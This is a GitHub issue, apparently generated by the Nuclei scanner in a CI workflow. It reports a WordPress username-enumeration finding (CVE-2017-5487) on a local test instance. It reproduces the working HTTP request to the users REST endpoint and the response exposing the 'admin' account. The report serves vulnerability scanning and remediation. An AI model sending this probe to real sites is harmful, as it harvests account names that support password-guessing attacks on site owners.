ehsandeep / wordpress-application

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

[CVE-2017-5487] [medium] WordPress Core < 4.7.1 - Username Enumeration found on http://127.0.0.1:31337

github-actions opened this issue · comments

Details: CVE-2017-5487 matched at http://127.0.0.1:31337

Protocol: HTTP

Full URL: http://127.0.0.1:31337/?rest_route=/wp/v2/users/

Timestamp: Tue Jul 6 13:46:35 +0000 UTC 2021

Template Information

Key Value
author Manas_Harsh,daffainfo
severity medium
description wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags cve,cve2017,wordpress
name WordPress Core < 4.7.1 - Username Enumeration

Request

GET /?rest_route=/wp/v2/users/ HTTP/1.1
Host: 127.0.0.1:31337
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 584
Access-Control-Allow-Headers: Authorization, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
Allow: GET
Content-Type: application/json; charset=UTF-8
Date: Tue, 06 Jul 2021 13:46:35 GMT
Link: <http://127.0.0.1:31337/index.php?rest_route=/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
Set-Cookie: wp_wpfileupload_5b2dbabcbcf581dd4a9fba6cd728b7f5=HSrh9MhFP3thOpy29CC3MsgWsfHqOkPk; expires=Thu, 08-Jul-2021 13:46:35 GMT; Max-Age=172800; path=/
Vary: Origin
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.1.33
X-Robots-Tag: noindex
X-Wp-Total: 1
X-Wp-Totalpages: 1

[{"id":1,"name":"admin","url":"","description":"","link":"http:\/\/127.0.0.1:31337\/?author=1","slug":"admin","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/e64c7d89f26bd1972efa854d13d7dd61?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/127.0.0.1:31337\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/127.0.0.1:31337\/index.php?rest_route=\/wp\/v2\/users"}]}}]

Reference:


Generated by Nuclei